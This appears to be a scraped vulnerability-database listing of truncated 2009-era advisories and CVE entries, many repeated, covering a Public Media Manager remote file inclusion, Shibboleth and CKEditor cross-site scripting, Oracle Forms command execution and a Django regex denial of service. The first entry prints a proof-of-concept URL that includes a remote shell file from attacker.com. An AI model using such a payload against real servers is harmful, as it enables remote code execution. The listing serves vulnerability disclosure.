Public Media Manager - Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Public Media Manager PoC : http://server/path/comcal/calmenu.php?formsdir=http://attacker.com/shell.txt?cmd 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...

Public Media Manager <= 1.3 (forms_dir) Remote File Include Vulnerability

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Public Media Manager = 1.3 formsdir Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/pmm-cms/files/ Dork : die"Lamers attempt"; :D Vuln : ./pmm-cms-1.3/comcal/calmenu.php line 4...

CVE-2009-3300

Multiple cross-site scripting XSS vulnerabilities in the Identity Provider IdP 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

CVE-2009-3300

Multiple cross-site scripting XSS vulnerabilities in the Identity Provider IdP 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

DEBIAN-CVE-2009-3300

Multiple cross-site scripting XSS vulnerabilities in the Identity Provider IdP 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

CVE-2009-3300

Multiple cross-site scripting XSS vulnerabilities in the Identity Provider IdP 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

CVE-2009-3300

Multiple cross-site scripting XSS vulnerabilities in the Identity Provider IdP 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

Oracle Application Server Forms Arbitrary System Command Execution (CVE-2005-2372)

Oracle Application Server is a multi-platform solution for developing and deploying enterprise applications and web sites. The server ships with several additional components that extend its functionality. One of such component is the Oracle Forms Services. The Forms Services component allows for...

Fedora 10 : Django-1.1.1-1.fc10 (2009-10432)

http://www.djangoproject.com/weblog/2009/oct/09/security/ Description of vulnerability ============================ Django's forms library included field types which perform regular-expression-based validation of email addresses and URLs. Certain addresses/URLs could trigger a pathological...

Fedora 11 : Django-1.1.1-1.fc11 (2009-10390)

http://www.djangoproject.com/weblog/2009/oct/09/security/ Description of vulnerability ============================ Django's forms library included field types which perform regular-expression-based validation of email addresses and URLs. Certain addresses/URLs could trigger a pathological...

CVE-2009-3695

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service CPU consumption via a crafted 1 EmailField email address or 2 URLField URL that triggers a large amount of backtracking in a regular...

Design/Logic Flaw

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service CPU consumption via a crafted 1 EmailField email address or 2 URLField URL that triggers a large amount of backtracking in a regular...

CVE-2009-3695

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service CPU consumption via a crafted 1 EmailField email address or 2 URLField URL that triggers a large amount of backtracking in a regular...

PYSEC-2009-4

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service CPU consumption via a crafted 1 EmailField email address or 2 URLField URL that triggers a large amount of backtracking in a regular...

DEBIAN-CVE-2009-3695

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service CPU consumption via a crafted 1 EmailField email address or 2 URLField URL that triggers a large amount of backtracking in a regular...

CVE-2009-3695

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service CPU consumption via a crafted 1 EmailField email address or 2 URLField URL that triggers a large amount of backtracking in a regular...

CVE-2009-3695

This CVE covers the Django forms library vulnerability where the regex used to validate EmailField and URLField can backtrack excessively, causing high CPU and potential denial of service. Affected versions are Django 1.0 before 1.0.4 and 1.1 before 1.1.1. The issue stems from algorithmic complex...

DSA-1905-1 python-django - denial of service

Bulletin has no description...

django -- denial-of-service attack

Django project reports: Django's forms library includes field types which perform regular-expression-based validation of email addresses and URLs. Certain addresses/URLs could trigger a pathological performance case in these regular expression, resulting in the server process/thread becoming...

XSS and Content Spoofing vulnerabilities in CKEditor

Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor. XSS: This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style. a href="http://test"...